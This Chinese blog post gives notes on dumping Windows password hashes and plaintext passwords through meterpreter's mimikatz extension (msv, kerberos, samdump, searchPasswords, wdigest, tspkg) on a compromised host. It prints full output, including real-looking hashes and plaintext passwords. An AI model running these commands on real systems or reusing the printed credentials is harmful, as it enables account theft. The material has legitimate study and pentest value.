今天测试某个站点时读hash老出错 这里做下读hash的笔记

进去meterpreter后getuid一

1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加载mimikatz模块

1
2
meterpreter > load mimikatz
Loading extension mimikatz...Success.

加载成功.

获取登录密码的hash值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
 
AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
 
AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  
0;49101   NTLM                                   
0;999     NTLM       WORKGROUP     CHENGLEE-PC$  
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

拿到登录的明文密码了.

不过也有一些特殊的情况, 例如这样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
 
AuthID      Package    Domain        User           Password
------      -------    ------        ----           --------
0;10408969  NTLM       CLOUDVM       Administrator
0;266228    NTLM       CLOUDVM       Administrator
0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996       Negotiate  WORKGROUP     CLOUDVM$
0;23595     NTLM
0;999       NTLM       WORKGROUP     CLOUDVM$

哈希值也获取不到,

使用另一种方式获取哈希值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93
 
Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
 
Rid  : 501
User : Guest
LM   :
NTLM :
 
Rid  : 1000
User : chenglee
LM   :
NTLM : 8d0f8e1a18236379538411a9056799f5

ok, 获取到了,

根据上面的方式获取明文密码

1
2
3
4
5
6
7
8
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >

2

1
2
3
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

都拿到了

另外提一下更简洁的方式,就是 wdigest命令了,

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
 
AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  
0;49101   NTLM                                   
0;999     NTLM       WORKGROUP     CHENGLEE-PC$  
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

还有一个跟wdigest一样的就是tspkg啦

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
 
AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE 
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$  
0;49101   NTLM                                   
0;999     NTLM       WORKGROUP     CHENGLEE-PC$  
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

最新文章

  1. Js函数function基础理解
  2. Windows系统使用putty远程连接DigitalOcean创建的Linux系统(CentOS6.7为例)
  3. [bzoj 3687]简单题 bitset的运用
  4. Review PHP设计模式之——单例模式
  5. Thrift原理与使用实例
  6. ACM生活总结
  7. 关于超链接自动提示的demo
  8. Power Network (最大流增广路算法模板题)
  9. 黑马程序员_JavaIO流(一)
  10. 厂商自定义USB设备类概述
  11. Debian安装JAVA环境(转载)
  12. [置顶] 简单解析linux下进程通信方法
  13. PHP 9: 表达式
  14. eclipse 发布web工程,修改tomcat端口
  15. JAVA基础知识系列---进程、线程安全
  16. golang 实现简单的一致性哈希
  17. wxpython 支持python语法高亮的自定义文本框控件的代码
  18. java读取配置文件信息
  19. 函数重载(overload)
  20. Java设计模式从精通到入门三 策略模式

热门文章

  1. Windows7关闭默认共享
  2. js 事件委托获取子元素下标
  3. charles Glist发布设置
  4. 【Sentinel】sentinel 集成 apollo 最佳实践
  5. PTA A1014
  6. [LeetCode]sum合集
  7. 【linux】【docker】docker及docker-compose安装
  8. MIT FiveK图像转化--DNG到TIFF,TIFF到JPEG
  9. SpringMVC 图片上传虚拟目录
  10. 用call或bind实现bind()